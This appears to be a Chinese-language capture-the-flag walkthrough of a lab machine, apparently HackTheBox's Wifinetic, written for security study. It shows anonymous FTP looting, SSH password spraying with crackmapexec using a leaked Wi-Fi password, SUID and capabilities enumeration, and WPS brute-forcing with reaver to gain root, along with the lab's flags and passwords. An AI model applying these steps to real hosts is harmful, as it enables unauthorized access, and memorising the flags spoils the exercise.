2023091801.jpg
2023091801.jpg

靶场信息

image.png
image.png

信息搜集

使用nmap对靶场进行端口扫描

1
nmap -sC -sV -Pn 10.10.11.247

开放的 TCP 端口:FTP (21)、SSH (22) 和 DNS (53)

  • 21端口开放的ftp服务
  • 22端口开放ssh服务,主机是ubuntu 20.04 focus
  • 53端口开放open vnp
image.png
image.png

漏洞利用

FTP-TCP 21

namp扫描得知ftp服务可以使用Anonymous登入ftp服务存在5个文件

image.png
image.png

下载5个文件

1
2
mkdir ftp
wget -r ftp://10.10.11.247
image.png
image.png

可以看到3个pdf,1个txt,1个rar压缩包

image.png
image.png

分别查看pdf
发现有其中泄露了俩个用户名

1
2
samantha.wood93
olivia.walker17
image.png
image.png
image.png
image.png

查看txt无发现

image.png
image.png

解压查看rar压缩包

1
tar -xvf backup-OpenWrt-2023-07-26.tar
image.png
image.png
image.png
image.png

查看一下passd,无发现

image.png
image.png

config是一个配置文件目录对其查看其中文件发现wifi密码

image.png
image.png

使用ssh对其进行尝试登入

1
2
3
cme ssh 10.10.11.247 -u user.txt -p 'VeRyUniUqWiFIPasswrd1!'

crackmapexec ssh 10.10.11.247 -u user.txt -p 'VeRyUniUqWiFIPasswrd1!' --continue-on-success
image.png
image.png
1
2
ssh [email protected]
VeRyUniUqWiFIPasswrd1!

ssh登入成功

image.png
image.png

flag1

拿到user权限的flag文件

1
2
3
id
ls
cat user.txt
image.png
image.png
1
2471dee96e082bd5df93c2dee9a1d038

权限提升

1.其他用户的主目录位于/home,netadmin用户无法访问这些目录

image.png
image.png

2./opt的 share与 FTP 上可用的目录相同

image.png
image.png
  1. 查找有suid属性权限的文件
    1
    2
    find / -perm -4000 -or -perm -2000 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    image.png
    image.png
  2. capabilities 提权
    1
    getcap -r / 2>/dev/null
    image.png
    image.png
    发现reaver-wps 破解器
1
2
reaver使用文档
https://manpages.ubuntu.com/manpages/jammy/man1/reaver.1.html

iw dev将提供有关无线接口的更多信息

image.png
image.png

使用刚刚发现的工具对其进行爆破

1
2
reaver
reaver -i mon0 -b 02:00:00:00:00:00 -vv
image.png
image.png

破解成功

1
WhatIsRealAnDWhAtIsNot51121!
image.png
image.png
1
su -
image.png
image.png

flag2

1
2
3
ls
cat root.txt
240a5267dd1db53f28c73e3d81253d1c
image.png
image.png

参考链接
https://0xdf.gitlab.io/2023/09/16/htb-wifinetic.html#background-1

申明:

本博客所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.